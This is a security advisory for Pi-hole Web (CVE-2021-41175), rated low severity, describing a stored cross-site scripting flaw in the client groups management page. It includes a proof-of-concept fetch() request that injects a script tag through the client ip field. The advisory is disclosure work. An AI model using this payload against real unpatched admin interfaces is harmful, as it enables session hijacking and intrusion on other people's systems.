Skip to content

Stored XSS in Client Groups Management (Authenticated)

Low
PromoFaux published GHSA-mhr8-7rvg-8r43 Oct 23, 2021

Package

Pi-hole Web (Pi-hole)

Affected versions

< 5.7

Patched versions

None

Description

Originally reported by Robert Punnett rpunnet@bishopfox.com

Also reported By Harold Kim <@stypr>

XSS possible when adding a client via the groups-clients management page

token = "csrf-token" // CSRF Token
admin_url = "http://192.168.125.129:81/admin"

fetch(admin_url + "/scripts/pi-hole/php/groups.php", {
  "headers": {
    "accept": "application/json, text/javascript, */*; q=0.01",
    "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6,zh-CN;q=0.5,zh;q=0.4",
    "cache-control": "no-cache",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "pragma": "no-cache",
    "x-requested-with": "XMLHttpRequest"
  },
  "referrer": "http://192.168.125.129:81/admin/groups-clients.php",
  "referrerPolicy": "strict-origin-when-cross-origin",
  "body": "action=add_client&ip=</code><script>alert(document.domain);</script>01%3A33%3AB3%3ACC%3ADA%3A46&comment=test&token=" + token,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

image

Severity

Low

CVE ID

CVE-2021-41175

Weaknesses

No CWEs